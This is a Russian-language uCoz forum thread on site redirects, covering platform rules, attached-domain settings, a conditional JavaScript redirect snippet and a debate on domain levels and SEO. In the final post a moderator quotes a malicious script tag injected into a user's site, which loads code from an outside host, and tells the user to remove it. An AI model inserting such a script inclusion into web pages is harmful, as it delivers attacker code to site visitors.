Модератор форума: Yuri_G |
Сообщество uCoz Модули uCoz Дополнительные функции Переадресация (редирект) (Описание темы) |
Переадресация (редирект) |
У меня два сайта, необходимо сделать переадресацию со старого на новый, как это можно сделать?
Мы запрещаем делать редиректы с сайта на сайт. Сайты, которые служат только редиректом, в любом случае не пройдут проверку на активность и будут удалены через время. Однако Вы можете на старом сайте разместить информацию о новом в виде ссылки и пояснительного текста о переезде, чтобы не потерять посетителей. Я к своему сайту site.ucoz.ru прикрепил домен site.net.ru. Могу я сделать переадресацию с site.ucoz.ru на site.net.ru? Да, можете. Для этого в общих настройках аккаунта включите опцию "Автоматически перенаправлять со стандартного домена на прикрепленный". Мне нужно сделать переадресацию с главной, например, на форум. Как я могу это сделать? В общих настройках аккаунта есть опция "При переходе на главную страницу открывать" - там Вы можете выбрать какой из модулей показывать при переходе на главную. Я хочу сменить название сайта (УРЛ) и перенаправлять посетителей на новый сайт, с новым названием, но это запрещено правилами системы. Что мне делать в таком случае? Чтобы сменить УРЛ сайта, необязательно создавать новый сайт, достаточно зарегистрировать себе домен, прикрепить его к сайту и в общих настройках аккаунта включить опцию "Автоматически перенаправлять со стандартного домена на прикрепленный" Скажите, если я сделаю переадресацию с главной на форум, отразится ли это как-то на поисковиках? Нет, фактически редиректа не происходит, а лишь место контента главной показывается контент модуля, соответственно поисковики будут видеть тот модуль при заходе на главную, который указан в общих настройках. Если я создам поддомен к сайту poddomen.site.ru, залью туда файлы и поставлю редирект на основной домен, будет ли это караться баном? Да, редирект с сайта на сайт запрещён в любом случае, также запрещено использовать сайт только для хранения файлов. Мне требуется НЕ авторизованных пользователей переадресовывать на страничку (созданную в корне сайта, отдельным файлом), как мне это реализовать? С помощью условных операторов. В шаблоны между и необходимо поставить следующий код: Код <?if!($USER_LOGGED_IN$)?><script type="text/javascript">window.location.href = "страница"</script><?endif?> ВНИМАНИЕ! Переадресация с одного сайта на другой запрещена! Сайты которые служат только для переадресации будут удалены! |
Цитата ( aibolit2007) Так может все таки стоит дать подсказку, новичку? Дайте. ТС - это, что? О какой персональной выдаче речь? Как бы 3 года уже с юкозом, но получается еще новичок. Нет, без шуток, подскажите, что нибуть дельное. Если все так хорошо и на Юкозе, зачем люди прикрепляют домены первого уровня? Для красоты только? Сомневаюсь, по той простой причине, что на Украине для домена 1 уровня регистрацию торговой марки пройти нужно, а это на минутку, при самом быстром раскладе 5-6 мес и около 1 000 у.е. денег. И все из-за стремления к благозвучию домена?! Сообщение отредактировал Kapitoshik - Понедельник, 18 Мар 2013, 08:35:51
|
Kapitoshik,
Цитата зачем люди прикрепляют домены первого уровня? Для красоты только? Моё личное мнение основанное на прошлом опыте именно так. Тем более что поисковики в недалёком прошлом заявили что домены 2 - 3 уровня для них равны по значимости. Все разговоры типа это лучше это хуже это дороже а это бесплатно чисто условное на словах разграничение. Смотрите сами это например домены какого уровня ? ru.wikipedia.org de.wikipedia.org en.wikipedia.org очередная фишка которая возможно стоит немалых денег .. Сообщение отредактировал Miss_Esq - Понедельник, 18 Мар 2013, 08:46:45
|
Цитата (Kapitoshik) ТС - это, что? О какой персональной выдаче речь? Цитата (aibolit2007) Так может все таки стоит дать подсказку, новичку? И все же? |
Kapitoshik,
Цитата И все из-за стремления к благозвучию домена?! Да ... домены Сообщение отредактировал Miss_Esq - Понедельник, 18 Мар 2013, 11:57:19
|
Цитата (Miss_Esq) Смотрите сами это например домены какого уровня ? ru.wikipedia.org de.wikipedia.org en.wikipedia.org очередная фишка которая возможно стоит немалых денег .. Которые воспринимаются поисковой системой как один сайт! Не удачный пример вы привели! Но в общем и целом вы правы! Сайты с доменами третьего уровня воспринимаются поисковыми системами, как один сайт, исключение хостинги сайтов! Так что сайт Kapitoshik = уникален! Цитата (Kapitoshik) Как бы 3 года уже с юкозом, но получается еще новичок. Нет, без шуток, подскажите, что нибуть дельное 3 года и такие вопросы! Цитата Прикрепление нового доменного имени к сайту на юкоз - это есть полноценный 301 редирект, т.е. весь вес сайта переходит на новый домен? Лично наблюдаю как гугл выдает периодически напротив описания моего сайта в выдаче - Юкоз)... думаю это не спроста. Не обижайтесь, но, чем вы отличаетесь от новичка? Цитата ТС - это, что? В отношении вас, насчет "ТС" - да я глюканул. ТС= создатель темы Цитата О какой персональной выдаче речь? Кто хочет, тот обретет! Цитата Если все так хорошо и на Юкозе, зачем люди прикрепляют домены первого уровня? Для красоты только? Сомневаюсь, по той простой причине, что на Украине для домена 1 уровня регистрацию торговой марки пройти нужно, а это на минутку, при самом быстром раскладе 5-6 мес и около 1 000 у.е. денег. И все из-за стремления к благозвучию домена?! Цитата (Miss_Esq) Да ... А престиж не в счет? Что для вас, как покупателя лучше, домен вида шмотки.жужутуту.ру, или шмотки.ру? Какой адрес у вас вызовет большее доверие? Домен 2 уровня, по любому лучше! Сообщение отредактировал aibolit2007 - Вторник, 19 Мар 2013, 00:54:57
|
определитесь с понятиями домен первого уровня и домен второго уровня. режут глаз ваши заявления о покупке доменов первого уровня. страна Олегархов
aibolit2007, Цитата Тут webanet //forum.ucoz.ru/forum/21-34453-779366-16-1321355570 надо мной стебалась, по поводу 301 редиректа! есть синтаксис (набор буков и словоформ) который принимается. та к вот, в роботсе можно обращаться отдельно не только к гуглу. можно написать обращение и к яндексу, что будет читаться правильно, но будет учитываться теми сканерами, к которым идет обращение. остальные строчки будут игнорировать, как гугл игнорирует хост, как он игнорирует прямые обращения к сканеру яндекса и гуглу не нужен хост. |
Цитата (ааwebanet) с хостом для гугла вы погорячились. или сделали открытие о котором гуглу придется сообщить отдельно, дабы был в курсе. есть синтаксис (набор буков и словоформ) который принимается. та к вот, в роботсе можно обращаться отдельно не только к гуглу. можно написать обращение и к яндексу, что будет читаться правильно, но будет учитываться теми сканерами, к которым идет обращение. остальные строчки будут игнорировать, как гугл игнорирует хост, как он игнорирует прямые обращения к сканеру яндекса и гуглу не нужен хост. Знаете, для меня на тот момент, это было открытием, по скольку "сказок" начитался Это сейчас, ваше заявление о играх с категориями, которые вы предложили у меня вызвало недоумение (по скольку я знаю как сделать, чтобы при смене категории, шел 301 редирект на новую категорию), а еще 1 год назад, вы бы меня озадачили! К чему все это? Будьте снисходительны к новичкам и ко мне, подскажите хотя бы элементарное! И дайте возможность ставить серверный редирект самостоятельно, пусть и с вашего (Юкоза) согласия. Сообщение отредактировал aibolit2007 - Вторник, 19 Мар 2013, 01:35:31
|
Цитата (aibolit2007) Не обижайтесь, но, чем вы отличаетесь от новичка Какие обиды. В поднятых вопросах я 100% новичок. И чего тут стесняться?! Цитата (Miss_Esq) Kapitoshik, ЦитатаИ все из-за стремления к благозвучию домена?! Да ... домены Цитата (webanet) определитесь с понятиями домен первого уровня и домен второго уровня. режут глаз ваши заявления о покупке доменов первого уровня. страна Олегархов Вот вот. Переадресация полная и однозназная сразу или индексировать поначалу оба адреса? Может еще нюансы. Тут прозвучало - "Грамотно сделать переадресацию", а как это сделать грамотно? |
aibolit2007,
Цитата Какой адрес у вас вызовет большее доверие? НИ ОДИН !!! Одно определение - "ШМОТКИ" отдаёт ориентацией на лохов гопников ... А вообще типа домен третьего уровня типа такой - элитные.шмотки.рф даже четвёртого или пятого (элитные.американские.шмотки.рф, элитные.американские.секондхенд.шмотки.рф) гораздо лучше чем первого, на такие домены клюнут охотнее ... как говорится в названии домена все уже есть .. Kapitoshik, Цитата Зговор??? Вы какой сайт собрались раскручивать? Сообщение отредактировал Miss_Esq - Вторник, 19 Мар 2013, 10:33:19
|
Цитата (Miss_Esq) НИ ОДИН !!! Одно определение - "ШМОТКИ" отдаёт ориентацией на лохов гопников ... А вообще типа домен третьего уровня типа такой - элитные.шмотки.рф даже четвёртого или пятого (элитные.американские.шмотки.рф, элитные.американские.секондхенд.шмотки.рф) гораздо лучше чем первого, на такие домены клюнут охотнее ... как говорится в названии домена все уже есть .. Домен вида элитные.американские.секондхенд.шмотки.рф, или элитные.американские.секондхенд.юкоз.ру? Для того чтобы сделать американские.секондхенд.шмотки.рф, нужно быть владельцем, этого самого, который для гопников Цитата: ""ШМОТКИ" отдаёт ориентацией на лохов гопников " Или шмотки.рф, уже продается, наподобие ком.ру? Сообщение отредактировал aibolit2007 - Среда, 20 Мар 2013, 19:51:19
|
Почитав тему у меня появился только 1 вывод, поправьте если не так понял:
Поменял я для 1 страницы url: c site.ru/category/straniza1 на site.ru/razdel/category/straniza1, то мне нужно создать 2 одинаковых страницы по этим адресам, но на страницу - site.ru/category/straniza1 вставить скрипт перенаправления на site.ru/razdel/category/straniza1 ? И возникает пару вопросов: будет ли вред для поисковиков моему сайту от такого дубляжа ? И честно говоря не приятно иметь 2 одинаковых страницы, пусть даже с редиректом. |
Bigrock, больше вреда от редиректа, чем от дубляжа. не увлекайтесь редиректами. вместо них используйте rel="canonical"
|
Здравствуйте,на моем сайте my-city.3dn.ru я сделал переадресацию на сайт denverakok.narod.ru,но 2 дня назад я купил домен и сделал переадресацию на www.on-livebox.com,я думаю что меня забанили за то что с сайта my-city.3dn.ru я сделал переадресацию с помощью кода,если меня забанили можно ли восстановить свой аккаунт (все-таки я домен 2 дня назад купил).Куда мне надо обращаться?У меня даже админ панель не открывается!А вот мой поддомен metropolis.on-livebox.com !(Я думал обратиться в службу поддержки,но как?,я ведь не могу даже в ПУ зайти!)
Добавлено (18 Июн 2013, 21:59:21) Цитата (Модератор форума) Переадресация с одного сайта на другой запрещена! Сайты которые служат только для переадресации будут удалены! Благодарности в репутацию и в награды!
P.S Плюс под аватаркой) |
Деееенчик, все ваши сайты открываются нормально. но сайт на народе заражен. из просилки войти или зарегистрироваться удалите скрипт
Код <script src="http://china-air.ru/tsed.js" type="text/javascript"></script> после удаления вредоносного кода четко и ясно поясните с чего вы взяли, что вас забанили. опишите проблему внятно |
| |||